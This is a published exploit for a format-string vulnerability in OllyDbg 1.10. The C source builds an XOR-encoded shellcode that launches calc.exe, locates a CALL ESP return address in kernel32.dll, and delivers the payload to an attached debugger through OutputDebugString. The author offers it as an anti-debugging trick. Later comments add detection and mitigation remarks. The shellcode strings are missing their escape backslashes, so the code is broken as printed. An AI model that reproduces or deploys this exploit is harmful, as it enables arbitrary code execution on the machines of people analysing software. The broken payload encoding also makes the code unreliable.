
# Title : OllyDbg 1.10 Local Format String Exploit
# Published : 2007-04-17
# Author : jamikazu


/*

..::[ jamikazu presents ]::..

OllyDbg v110 Local Format String Exploit (0day)

Author: jamikazu
Mail: jamikazu@gmail.com
web: http://jamikazu.110mb.com/

Bug discovered by Ned from (http://felinemenace.org/)

Credit: ap0x,milw0rm

Greets: All turkish security researchers ...

invokes calc.exe if successful

You can use it for your AntiCrack tricks against vuln OllyDbg

*/


#define NO_WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <string.h>

#define FORMAT_STRING       "%4602u"
#define XOR_DWORD           0x02020202

#ifdef __BORLANDC__
#   pragma option -w-asc
#   pragma option -w-eff
#else
#pragma comment(linker,"/ENTRY:WinMain") 
#pragma comment(lib, "msvcrt.lib") 
#endif


// Payload bytes, XOR-masked with 0x02 (the same key as XOR_DWORD); the
// author gives the decoded size as 239 bytes and says it first shows a
// message box and then starts calc.exe.
//
// This array is NOT the final payload: WinMain overwrites three DWORD
// slots in it at runtime (offsets 0x3E, 0x50 and 0x59) with XOR-masked
// API addresses before the string is emitted.  Detection that keys on the
// literal bytes below should account for that patching.
//
// Size constraint (author's note): at most
//   256 - sizeof(FORMAT_STRING) - sizeof(DWORD) /* ret */
// bytes of payload fit, because the vulnerable debugger copies the
// user-supplied string into a fixed 256-byte buffer, using the user data
// itself as the format string:
//   char buffer[256];
//   snprintf(buffer, 256, user_buffer);
//   buffer[255] = '\0';
char shellcode[] =
	"xEBx0Fx58x80x30x02x40x81x38x4Fx4Cx4Cx41x75xF4xEBx05"
	"xE8xECxFFxFFxFFx57x89xEEx81xEEx0ExEAx02x02x02x02x5A"
	"x2Fx91x15x42x02x8Bx47xF6x68x42x07x48x1Ax42x02x52x89"
	"x47xF6x07xD7x15x42x02x52x68x02xBAx01x01x01x01xFDxD2"
	"x68x07x89x47xF6x07x50x1Ax42x02x52xBAx07x07x07x07xFD"
	"xD2x68x02xBAx06x06x06x06xFDxD2x89xE7x5FxC1x43x76x76"
	"x63x61x69x22x6Bx71x22x71x77x61x61x67x71x71x64x77x6E"
	"x23x08x08x55x67x22x63x70x67x22x6Bx6Cx22x76x6Ax67x22"
	"x72x70x6Dx61x67x71x71x22x61x6Dx6Cx76x67x7Ax76x22x6D"
	"x64x22x4Dx6Ex6Ex7Bx46x60x65x2Cx67x7Ax67x08x6Cx6Dx75"
	"x22x75x67x22x75x6Bx6Ex6Ex22x6Ex63x77x6Cx61x6Ax22x61"
	"x63x6Ex61x2Cx67x7Ax67x22x2Ax75x6Bx6Cx66x6Dx75x71x22"
	"x61x63x6Ex61x77x6Ex63x76x6Dx70x2Bx02x4Dx6Ex6Ex7Bx46"
	"x60x65x02x61x63x6Ex61x02x61x63x6Ex61x02x4Fx4Cx4Cx41";

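/*
 * Byte-wise search for the first occurrence of pvSubStream inside pvStream.
 *
 * pvStream       : haystack; not NUL-terminated, at most uStreamSize bytes
 *                  are read from it
 * uStreamSize    : number of bytes in pvStream
 * pvSubStream    : needle
 * uSubStreamSize : number of bytes in pvSubStream
 *
 * Returns the byte offset of the first match, or (DWORD)-1 when there is
 * no match, when either pointer is NULL, when the needle is empty, or when
 * the needle is longer than the haystack.
 *
 * Fixes relative to the original: the comparison never reads past
 * pvStream + uStreamSize (the old loop compared the needle against bytes
 * beyond the haystack when a partial match ran into the end), and an
 * empty needle no longer makes the loop bound wrap around to SIZE_MAX.
 */
DWORD SearchStream(
    const char *pvStream,
    size_t uStreamSize,
    const char *pvSubStream,
    size_t uSubStreamSize
)
{
    if (pvStream == NULL || pvSubStream == NULL) {
        return (DWORD)-1;
    }
    if (uSubStreamSize == 0 || uSubStreamSize > uStreamSize) {
        return (DWORD)-1;
    }

    /* Last offset at which the whole needle still fits inside the haystack. */
    size_t uLast = uStreamSize - uSubStreamSize;

    for (size_t uOffset = 0; uOffset <= uLast; uOffset++) {
        if (memcmp(pvStream + uOffset, pvSubStream, uSubStreamSize) == 0) {
            return (DWORD)uOffset;
        }
    }

    return (DWORD)-1;
}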

// Chooses the return address placed in the trigger string: the absolute
// address of the first occurrence of the two-byte pattern pszCallEsp (the
// original comment identifies it as CALL ESP) inside the mapped
// kernel32.dll image.
//
// No parameters.  Returns hModule + offset of the first match.  The
// not-found case is not handled: SearchStream's (DWORD)-1 sentinel is
// simply added to hModule, which yields hModule - 1.  The result of
// GetModuleHandle is likewise used without a NULL check.
//
// Defender's note: the scan covers SizeOfImage bytes from the module base,
// i.e. the entire mapped image; whether every page in that range is
// readable is not verified here.
DWORD FindRetToEspAddress(VOID)
{
    HMODULE hModule = GetModuleHandle("kernel32.dll");   // unchecked: may be NULL
    DWORD dwEspRet;
    char* pszCallEsp = "xFFxD4"; // CALL ESP
    //char* pszJmpEsp  = "xFFxE4"; // JMP ESP

    PIMAGE_DOS_HEADER pimage_dos_header;
    PIMAGE_NT_HEADERS pimage_nt_headers;

    // Walk the PE headers: the DOS header sits at the module base and its
    // e_lfanew field gives the offset of the NT headers.
    pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
    pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);

    // Scan the whole image for the pattern; only sizeof(WORD) == 2 bytes of
    // pszCallEsp take part in the comparison.
    dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));

    // Offset -> absolute address.  A (DWORD)-1 "not found" result is not
    // detected before the addition.
    return (dwEspRet += (DWORD)hModule);
}

// Program entry point (the linker pragma above selects it as /ENTRY).
// Assembles the trigger string -- FORMAT_STRING, then the return address,
// then the runtime-patched shellcode -- and emits it through
// OutputDebugString, which is the channel by which it reaches the attached
// debugger.  The WinMain parameters are not used.
//
// Review notes (defender's view):
//  * The attack surface is a debugger that feeds a debuggee's
//    OutputDebugString text to snprintf as the format string; with an
//    unpatched OllyDbg 1.10 any debuggee can drive this path, so the
//    mitigation is a fixed debugger build or isolating the analysis host.
//  * malloc() is never checked; a failed allocation leads to memset
//    writing through a NULL pointer.
//  * ulEvilBufSize counts both string terminators, but the three memcpy
//    calls copy two bytes fewer than that and nothing writes a NUL, so the
//    buffer is never explicitly NUL-terminated: its last two bytes keep the
//    0x90 fill and OutputDebugString reads on until some zero byte beyond
//    the copied data.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    char* pszEvilBuffer;
    ULONG ulEvilBufSize;

    // Resolve the three APIs the payload calls and mask each address with
    // XOR_DWORD (0x02020202) -- the same 0x02 key the shellcode bytes are
    // encoded with, so the payload's decoder recovers the real addresses.
    // LoadLibrary/GetProcAddress results are not checked.
    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA")^XOR_DWORD;
    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"WinExec")^XOR_DWORD;
    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"ExitProcess")^XOR_DWORD;

    // Absolute address inside kernel32.dll; FindRetToEspAddress does not
    // report the not-found case, and it is not checked here either.
    DWORD dwRetAddr = FindRetToEspAddress();

    int i = 0;

    // Patch the three masked API addresses into fixed slots of the payload.
    memcpy(shellcode+0x3E,&dw_MessageBoxA,sizeof(DWORD));
    memcpy(shellcode+0x50,&dw_WinExec,sizeof(DWORD));
    memcpy(shellcode+0x59,&dw_ExitProcess,sizeof(DWORD));

    // Includes the NUL of FORMAT_STRING and of shellcode, i.e. two bytes
    // more than are copied below.
    ulEvilBufSize = sizeof(FORMAT_STRING) + sizeof(dwRetAddr) + sizeof(shellcode);

    pszEvilBuffer = (char*)malloc(ulEvilBufSize);   // unchecked allocation
    memset(pszEvilBuffer,0x90,ulEvilBufSize);

    // Layout: format directive | return address | payload (terminators dropped).
    memcpy(pszEvilBuffer+i, FORMAT_STRING, sizeof(FORMAT_STRING)-1); i += sizeof(FORMAT_STRING)-1;
    memcpy(pszEvilBuffer+i, &dwRetAddr,          sizeof(dwRetAddr)); i += sizeof(dwRetAddr);
    memcpy(pszEvilBuffer+i, shellcode,         sizeof(shellcode)-1); i += sizeof(shellcode)-1;

    // Final =)
    // Delivery: the string goes to whichever debugger is attached; the
    // buffer has no explicit terminator at this point (see notes above).
    OutputDebugString(pszEvilBuffer);

    free(pszEvilBuffer);
    return 0;
}
